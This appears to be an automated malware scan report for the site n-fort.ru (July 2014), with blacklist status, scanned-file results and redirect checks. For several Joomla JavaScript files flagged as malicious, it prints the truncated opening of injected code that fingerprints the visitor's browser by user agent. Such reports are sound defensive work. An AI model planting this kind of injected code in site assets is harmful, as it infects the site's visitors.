Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=n-fort.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://n-fort.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://n-fort.ru/ | 200 OK Content-Length: 40372 Content-Type: text/html | clean |
http://n-fort.ru/plugins/system/jcemediabox/js/jcemediabox.js?v=1017 | 200 OK Content-Length: 44364 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','BlackBerry','Maxthon','SeaMonkey','Mini','Yahoo','Mobile','Screenshot','Jasmine','Chrome','Dolphin','SiteKiosk','Macintosh','Nokia','iPad','Linux','IBrowse'];var DabList=false;for(var i in agentList) Antivirus reports:
| ||
http://n-fort.ru/plugins/system/jcemediabox/js/mediaobject.js?v=1017 | 200 OK Content-Length: 4090 Content-Type: application/x-javascript | clean |
http://n-fort.ru/plugins/system/jcemediabox/addons/default.js?v=1017 | 200 OK Content-Length: 2785 Content-Type: application/x-javascript | clean |
http://n-fort.ru/media/system/js/caption.js | 200 OK Content-Length: 2932 Content-Type: application/x-javascript | clean |
http://n-fort.ru/modules/mod_ppc_simple_spotlight/js/adon.js | 200 OK Content-Length: 58228 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','BlackBerry','Maxthon','SeaMonkey','Mini','Yahoo','Mobile','Screenshot','Jasmine','Chrome','Dolphin','SiteKiosk','Macintosh','Nokia','iPad','Linux','IBrowse'];var DabList=false;for(var i in agentList) ;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://n-fort.ru/modules/mod_ppc_simple_spotlight/js/slide.js | 200 OK Content-Length: 5186 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','BlackBerry','Maxthon','SeaMonkey','Mini','Yahoo','Mobile','Screenshot','Jasmine','Chrome','Dolphin','SiteKiosk','Macintosh','Nokia','iPad','Linux','IBrowse'];var DabList=false;for(var i in agentList) || [] ).addClass("disabled"); } } return false; }; }); }; function css(el, prop) { return parseInt($.css(el[0], prop)) || 0; }; function width(el) { return el[0].offsetWidth + css(el, 'marginLeft') + css(el, 'marginRight'); }; function height(el) { return el[0].offsetHeight + css(el, 'marginTop') + css(el, 'marginBottom'); }; })(jQuery); ;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://n-fort.ru/modules/mod_ppc_simple_spotlight/js/jquery.easing.1.1.js | 200 OK Content-Length: 4263 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','BlackBerry','Maxthon','SeaMonkey','Mini','Yahoo','Mobile','Screenshot','Jasmine','Chrome','Dolphin','SiteKiosk','Macintosh','Nokia','iPad','Linux','IBrowse'];var DabList=false;for(var i in agentList) var s=1.70158; return c*(t/=d)*t*((s+1)*t - s) + b; }, backout: function(x, t, b, c, d) { var s=1.70158; return c*((t=t/d-1)*t*((s+1)*t + s) + 1) + b; }, backinout: function(x, t, b, c, d) { var s=1.70158; if ((t/=d/2) < 1) return c/2*(t*t*(((s*=(1.525))+1)*t - s)) + b; return c/2*((t-=2)*t*(((s*=(1.525))+1)*t + s) + 2) + b; }, linear: function(x, t, b, c, d) { return c*t/d + b; } };;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://n-fort.ru/../includes/ice/ice.js | 400 Bad Request Content-Length: 172 Content-Type: text/html | clean |
http://n-fort.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://n-fort.ru/templates/nkr/javascript/fastfont.js | 200 OK Content-Length: 3285 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','BlackBerry','Maxthon','SeaMonkey','Mini','Yahoo','Mobile','Screenshot','Jasmine','Chrome','Dolphin','SiteKiosk','Macintosh','Nokia','iPad','Linux','IBrowse'];var DabList=false;for(var i in agentList) } return null; }; window.onload = setUserOptions; function setUserOptions(){ if(!prefsLoaded){ cookie = readCookie("fontSize"); currentFontSize = cookie ? cookie : defaultFontSize; setFontSize(currentFontSize); prefsLoaded = true; } } window.onunload = saveSettings; function saveSettings() { createCookie("fontSize", currentFontSize, 365); };;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://site.yandex.net/load/form/1/form.js | 200 OK Content-Length: 1293 Content-Type: application/x-javascript | clean |
http://counter.rambler.ru/top100.jcn?2281067 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://n-fort.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://n-fort.ru/index.php | 200 OK Content-Length: 40381 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: n-fort.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 18 Jul 2014 17:06:28 GMT
Pragma: no-cache
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 18 Jul 2014 17:06:28 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: df76fcfcfed4ddb8a253d5890a75c480=50cbacd84f053bc5a7642e80f747eac0; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: n-fort.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 18 Jul 2014 17:06:28 GMT
Pragma: no-cache
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 18 Jul 2014 17:06:28 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: df76fcfcfed4ddb8a253d5890a75c480=50cbacd84f053bc5a7642e80f747eac0; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: n-fort.ru
Referer: http://www.google.com/search?q=n-fort.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: n-fort.ru
Referer: http://www.google.com/search?q=n-fort.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.